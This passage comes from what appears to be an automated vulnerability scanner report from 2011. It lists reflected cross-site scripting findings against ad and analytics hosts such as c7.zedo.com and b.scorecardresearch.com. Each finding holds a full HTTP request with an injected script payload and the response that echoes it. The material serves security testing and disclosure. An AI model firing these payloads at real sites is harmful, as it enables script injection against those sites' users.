This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=2113&c3=13&c4=13473&c5=45394&c6=d842d<script>alert(1)</script>1190baab365&c10=239096&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/post/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Sun, 18 Sep 2011 00:45:18 GMT
Date: Sun, 04 Sep 2011 00:45:18 GMT
Content-Length: 1249
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"8", c2:"2113", c3:"13", c4:"13473", c5:"45394", c6:"d842d<script>alert(1)</script>1190baab365", c10:"239096", c15:"", c16:"", r:""});



5.24. http://c7.zedo.com/bar/v16-504/c5/jsc/fm.js [$ parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /bar/v16-504/c5/jsc/fm.js

Issue detail

The value of the $ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3654a'%3balert(1)//60894199582 was submitted in the $ parameter. This input was echoed as 3654a';alert(1)//60894199582 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-504/c5/jsc/fm.js?c=825/403/1&a=0&f=&n=305&r=13&d=15&q=&$=3654a'%3balert(1)//60894199582&s=263&z=0.7735994893591851 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.charlotteobserver.com/2011/09/03/2577566/raceday-danica-already-gone.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZFFBbh=977B826,20|121_977#0; ZFFAbh=977B826,20|121_977#365; FFBbh=977B305,20|149_1#0; FFgeo=5386156; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=305:3654a';alert(1)//60894199582,a877b';expires=Sun, 04 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=305,825,15:305,825,0:0,825,15:305,0,15:0,0,0;expires=Sun, 04 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=94:4:4:0:1;expires=Sun, 04 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "8710bb37-8952-4aa4e77af70c0"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=210
Expires: Sun, 04 Sep 2011 01:08:03 GMT
Date: Sun, 04 Sep 2011 01:04:33 GMT
Content-Length: 970
Connection: close

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var y10=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=263;var zzPat='3654a';alert(1)//60894199582,a877b'';var zzCustom='';var zzTitle='';
if(typeof zzStr=='undefined'){
var zzStr="q=3654a';alert(1)//60894199582,a877b';z="+Math.random();}

if(zzuid=='unknown')zzuid='k5xiThcyanucBq9IXvhSGSz5~090311'
...[SNIP]...

5.25. http://c7.zedo.com/bar/v16-504/c5/jsc/fm.js [$ parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /bar/v16-504/c5/jsc/fm.js

Issue detail

The value of the $ request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 90cbc"-alert(1)-"db48eb64b4f was submitted in the $ parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-504/c5/jsc/fm.js?c=825/403/1&a=0&f=&n=305&r=13&d=15&q=&$=90cbc"-alert(1)-"db48eb64b4f&s=263&z=0.7735994893591851 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.charlotteobserver.com/2011/09/03/2577566/raceday-danica-already-gone.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZFFBbh=977B826,20|121_977#0; ZFFAbh=977B826,20|121_977#365; FFBbh=977B305,20|149_1#0; FFgeo=5386156; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=305:90cbc"-alert(1)-"db48eb64b4f,2f1b3%22%3b1567743ee5c,2f1b3";expires=Sun, 04 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=305,825,15:305,825,0:0,825,15:305,0,15:0,0,0;expires=Sun, 04 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=92:4:4:0:1;expires=Sun, 04 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "8710bb37-8952-4aa4e77af70c0"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=210
Expires: Sun, 04 Sep 2011 01:08:03 GMT
Date: Sun, 04 Sep 2011 01:04:33 GMT
Content-Length: 1016
Connection: close

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var y10=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=263;var zzPat='90cbc"-alert(1)-"db48eb64b4f,2f1b3%22%3b1567743ee5c,2f1b3"';var zzCustom='';var zzTitle='';
if(typeof zzStr=='undefined'){
var zzStr="q=90cbc"-alert(1)-"db48eb64b4f,2f1b3%22%3b1567743ee5c,2f1b3";z="+Math.random();}

if(zzuid=='unknown')zzuid='k5xiThcyanucBq9IXvhSGSz5~090311';

var zzhasAd=undefined;
var zzpixie = new Image();
var zzRandom = Math.random();
var zzD
...[SNIP]...

5.26. http://c7.zedo.com/bar/v16-504/c5/jsc/fm.js [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /bar/v16-504/c5/jsc/fm.js

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d3d47'-alert(1)-'252696a21cc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-504/c5/jsc/fm.js?d3d47'-alert(1)-'252696a21cc=1 HTTP/1.1
Host: c7.zedo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 1017
Content-Type: application/x-javascript
Set-Cookie: FFad=17:12:9:9:1;expires=Sun, 04 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=0,0,0:305,825,15:305,825,0:0,825,15:305,0,15;expires=Sun, 04 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "8710bb37-8952-4aa4e77af70c0"
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=207
Expires: Sun, 04 Sep 2011 01:25:35 GMT
Date: Sun, 04 Sep 2011 01:22:08 GMT
Connection: close

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var y10=new Image();

y10.src='http://r1.zedo.com/ads2/p/'+Math.random()+'/ERR.gif?v=bar/v16-504/c5;referrer='+document.referrer+';tag=c7.zedo.com/bar/v16-504/c5/jsc/fm.js;qs=d3d47'-alert(1)-'252696a21cc=1;';

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=0;var zzPat='';var zzCustom='';var zzTitle='';
if(typeof zzStr=='undefined'){
var zzStr="q=;z="+Math.
...[SNIP]...

5.27. http://c7.zedo.com/bar/v16-504/c5/jsc/fm.js [q parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /bar/v16-504/c5/jsc/fm.js

Issue detail

The value of the q request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1609e'%3balert(1)//f15cbe80920 was submitted in the q parameter. This input was echoed as 1609e';alert(1)//f15cbe80920 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-504/c5/jsc/fm.js?c=825/403/1&a=0&f=&n=305&r=13&d=15&q=1609e'%3balert(1)//f15cbe80920&$=&s=263&z=0.7735994893591851 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.charlotteobserver.com/2011/09/03/2577566/raceday-danica-already-gone.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZFFBbh=977B826,20|121_977#0; ZFFAbh=977B826,20|121_977#365; FFBbh=977B305,20|149_1#0; FFgeo=5386156; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=305:609c0'-alert(1)-'ce33e99e75d,1726d%27%3b9f644ea3489,1726d';expires=Sun, 04 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=305,825,15:305,825,0:0,825,15:305,0,15:0,0,0;expires=Sun, 04 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=84:4:4:0:1;expires=Sun, 04 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "8710bb37-8952-4aa4e77af70c0"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=210
Expires: Sun, 04 Sep 2011 01:08:03 GMT
Date: Sun, 04 Sep 2011 01:04:33 GMT
Content-Length: 1074
Connection: close

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var y10=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=263;var zzPat='1609e';alert(1)//f15cbe80920,609c0'-alert(1)-'ce33e99e75d,1726d%27%3b9f644ea3489,1726d'';var zzCustom='';var zzTitle='';
if(typeof zzStr=='undefined'){
var zzStr="q=1609e';alert(1)//f15cbe80920,609c0'-alert(1)-'ce33e99e75d,1726d%
...[SNIP]...

5.28. http://c7.zedo.com/bar/v16-504/c5/jsc/fmr.js [$ parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /bar/v16-504/c5/jsc/fmr.js

Issue detail

The value of the $ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b2602'%3balert(1)//50efe9478c4 was submitted in the $ parameter. This input was echoed as b2602';alert(1)//50efe9478c4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-504/c5/jsc/fmr.js?c=825/403/1&a=0&f=&n=305&r=13&d=15&q=&$=b2602'%3balert(1)//50efe9478c4&s=263&z=0.7735994893591851 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.charlotteobserver.com/2011/09/03/2577566/raceday-danica-already-gone.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZFFBbh=977B826,20|121_977#0; ZFFAbh=977B826,20|121_977#365; FFBbh=977B305,20|149_1#0; FFgeo=5386156; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311; ZCBC=1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=305:b2602';alert(1)//50efe9478c4,54f5b;expires=Sun, 04 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=305,825,15:305,825,0:0,825,15:305,0,15:0,0,0;expires=Sun, 04 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=36:9:9:1:1;expires=Sun, 04 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "cff199-8747-4aa4e7838c500"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=192
Expires: Sun, 04 Sep 2011 01:08:03 GMT
Date: Sun, 04 Sep 2011 01:04:51 GMT
Content-Length: 968
Connection: close

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var y10=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=263;var zzPat='b2602';alert(1)//50efe9478c4,54f5b';var zzCustom='';var zzTitle='';
if(typeof zzStr=='undefined'){
var zzStr="q=b2602';alert(1)//50efe9478c4,54f5b;z="+Math.random();}

if(zzuid=='unknown')zzuid='k5xiThcyanucBq9IXvhSGSz5~090311';

...[SNIP]...

5.29. http://c7.zedo.com/bar/v16-504/c5/jsc/fmr.js [$ parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /bar/v16-504/c5/jsc/fmr.js

Issue detail

The value of the $ request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9b766"%3balert(1)//2264924547d was submitted in the $ parameter. This input was echoed as 9b766";alert(1)//2264924547d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-504/c5/jsc/fmr.js?c=825/403/1&a=0&f=&n=305&r=13&d=15&q=&$=9b766"%3balert(1)//2264924547d&s=263&z=0.7735994893591851 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.charlotteobserver.com/2011/09/03/2577566/raceday-danica-already-gone.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZFFBbh=977B826,20|121_977#0; ZFFAbh=977B826,20|121_977#365; FFBbh=977B305,20|149_1#0; FFgeo=5386156; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311; ZCBC=1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=305:9b766";alert(1)//2264924547d,54f5b;expires=Sun, 04 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=305,825,15:305,825,0:0,825,15:305,0,15:0,0,0;expires=Sun, 04 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=34:9:9:1:1;expires=Sun, 04 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "cff199-8747-4aa4e7838c500"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=192
Expires: Sun, 04 Sep 2011 01:08:03 GMT
Date: Sun, 04 Sep 2011 01:04:51 GMT
Content-Length: 968
Connection: close

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var y10=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=263;var zzPat='9b766";alert(1)//2264924547d,54f5b';var zzCustom='';var zzTitle='';
if(typeof zzStr=='undefined'){
var zzStr="q=9b766";alert(1)//2264924547d,54f5b;z="+Math.random();}

if(zzuid=='unknown')zzuid='k5xiThcyanucBq9IXvhSGSz5~090311';

var zzhasAd=undefined;
var zzpixie = new Image();
var zzRandom = Math.random();
var zzDate = new Date();
var zz
...[SNIP]...

5.30. http://c7.zedo.com/bar/v16-504/c5/jsc/fmr.js [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /bar/v16-504/c5/jsc/fmr.js

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 764dd'-alert(1)-'b14c84fceac was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-504/c5/jsc/fmr.js?764dd'-alert(1)-'b14c84fceac=1 HTTP/1.1
Host: c7.zedo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 1018
Content-Type: application/x-javascript
Set-Cookie: FFad=12:12:9:9:1;expires=Sun, 04 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=0,0,0:305,825,15:305,825,0:0,825,15:305,0,15;expires=Sun, 04 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "cff199-8747-4aa4e7838c500"
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=207
Expires: Sun, 04 Sep 2011 01:25:35 GMT
Date: Sun, 04 Sep 2011 01:22:08 GMT
Connection: close

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var y10=new Image();

y10.src='http://r1.zedo.com/ads2/p/'+Math.random()+'/ERR.gif?v=bar/v16-504/c5;referrer='+document.referrer+';tag=c7.zedo.com/bar/v16-504/c5/jsc/fmr.js;qs=764dd'-alert(1)-'b14c84fceac=1;';

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=0;var zzPat='';var zzCustom='';var zzTitle='';
if(typeof zzStr=='undefined'){
var zzStr="q=;z="+Math.
...[SNIP]...

5.31. http://c7.zedo.com/bar/v16-504/c5/jsc/fmr.js [q parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /bar/v16-504/c5/jsc/fmr.js

Issue detail

The value of the q request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 33515"%3balert(1)//6ad1a189d09 was submitted in the q parameter. This input was echoed as 33515";alert(1)//6ad1a189d09 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-504/c5/jsc/fmr.js?c=825/403/1&a=0&f=&n=305&r=13&d=15&q=33515"%3balert(1)//6ad1a189d09&$=&s=263&z=0.7735994893591851 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.charlotteobserver.com/2011/09/03/2577566/raceday-danica-already-gone.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZFFBbh=977B826,20|121_977#0; ZFFAbh=977B826,20|121_977#365; FFBbh=977B305,20|149_1#0; FFgeo=5386156; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311; ZCBC=1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=305:54f5b;expires=Sun, 04 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=305,825,15:305,825,0:0,825,15:305,0,15:0,0,0;expires=Sun, 04 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=26:9:9:1:1;expires=Sun, 04 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "cff199-8747-4aa4e7838c500"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=192
Expires: Sun, 04 Sep 2011 01:08:03 GMT
Date: Sun, 04 Sep 2011 01:04:51 GMT
Content-Length: 968
Connection: close

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var y10=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=263;var zzPat='33515";alert(1)//6ad1a189d09,54f5b';var zzCustom='';var zzTitle='';
if(typeof zzStr=='undefined'){
var zzStr="q=33515";alert(1)//6ad1a189d09,54f5b;z="+Math.random();}

if(zzuid=='unknown')zzuid='k5xiThcyanucBq9IXvhSGSz5~090311';

var zzhasAd=undefined;
var zzpixie = new Image();
var zzRandom = Math.random();
var zzDate = new Date();
var zz
...[SNIP]...

5.32. http://c7.zedo.com/bar/v16-504/c5/jsc/fmr.js [q parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /bar/v16-504/c5/jsc/fmr.js

Issue detail

The value of the q request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9627f'%3balert(1)//e9576e37d36 was submitted in the q parameter. This input was echoed as 9627f';alert(1)//e9576e37d36 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-504/c5/jsc/fmr.js?c=825/403/1&a=0&f=&n=305&r=13&d=15&q=9627f'%3balert(1)//e9576e37d36&$=&s=263&z=0.7735994893591851 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.charlotteobserver.com/2011/09/03/2577566/raceday-danica-already-gone.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZFFBbh=977B826,20|121_977#0; ZFFAbh=977B826,20|121_977#365; FFBbh=977B305,20|149_1#0; FFgeo=5386156; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311; ZCBC=1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=305:54f5b;expires=Sun, 04 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=305,825,15:305,825,0:0,825,15:305,0,15:0,0,0;expires=Sun, 04 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=28:9:9:1:1;expires=Sun, 04 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "cff199-8747-4aa4e7838c500"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=192
Expires: Sun, 04 Sep 2011 01:08:03 GMT
Date: Sun, 04 Sep 2011 01:04:51 GMT
Content-Length: 968
Connection: close

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var y10=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=263;var zzPat='9627f';alert(1)//e9576e37d36,54f5b';var zzCustom='';var zzTitle='';
if(typeof zzStr=='undefined'){
var zzStr="q=9627f';alert(1)//e9576e37d36,54f5b;z="+Math.random();}

if(zzuid=='unknown')zzuid='k5xiThcyanucBq9IXvhSGSz5~090311';

...[SNIP]...

5.33. http://cm.npc-mcclatchy.overture.com/js_1_0/ [css_url parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cm.npc-mcclatchy.overture.com
Path:   /js_1_0/

Issue detail

The value of the css_url request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 17667"><script>alert(1)</script>0f9450ed1bb was submitted in the css_url parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /js_1_0/?config=1001507650&type=lifestyle&ctxtId=lifestyle&keywordCharEnc=utf8&source=npc_mcclatchy_sacramentobee_t1_ctxt&adwd=728&adht=90&ctxtUrl=http%3A%2F%2Fwww.sacbee.com%2F2011%2F09%2F03%2F3883102%2Fsprint-could-be-winner-in-thwarted.html&ctxtCat=lifestyle&outputCharEnc=latin1&css_url=http://static.mcclatchyinteractive.com/static/styles/mi/third_party/yahoo/yahoo.css17667"><script>alert(1)</script>0f9450ed1bb&tg=1&refUrl=http%3A%2F%2Fwww.sacbee.com%2F2011%2F09%2F03%2F3883102%2Fsprint-could-be-winner-in-thwarted.html&du=1&cb=1315097138735&ctxtContent=%3Chead%3E%0A%20%0A%0A%0A%0A%0A%0A%0A%0A%3Cscript%20async%3D%22%22%20src%3D%22http%3A%2F%2Fb.scorecardresearch.com%2Fbeacon.js%22%3E%3C%2Fscript%3E%3Cscript%20async%3D%22%22%20src%3D%22http%3A%2F%2Fb.scorecardresearch.com%2Fbeacon.js%22%3E%3C%2Fscript%3E%3Cscript%20language%3D%22JavaScript%22%3E%0A%3C!--%20%0Avar%20gomez%3D%7B%20%0A%09gs%3A%20new%20Date().getTime()%2C%20%0A%09acctId%3A'D3FD89'%2C%20%0A%09pgId%3A'story-detail'%2C%20%0A%09grpId%3A'Sacbee'%20%0A%7D%3B%0A%0A%0A%2F*Gomez%20tag%20version%3A%207.0*%2Fvar%20gomez%3Dgomez%3Fgomez%3A%7B%7D%3Bgomez.h3%3Dfunction(d%2C%20s)%7Bfor(var%20p%20in%20s)%7Bd%5Bp%5D%3Ds%5Bp%5D%3B%7Dreturn%20d%3B%7D%3Bgomez.h3(gomez%2C%7Bb3%3Afunction(r)%7Bif(r%3C%3D0)return%20false%3Breturn%20Math.random()%3C%3Dr%26%26r%3B%7D%2Cb0 HTTP/1.1
Host: cm.npc-mcclatchy.overture.com
Proxy-Connection: keep-alive
Referer: http://www.sacbee.com/2011/09/03/3883102/sprint-could-be-winner-in-thwarted.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
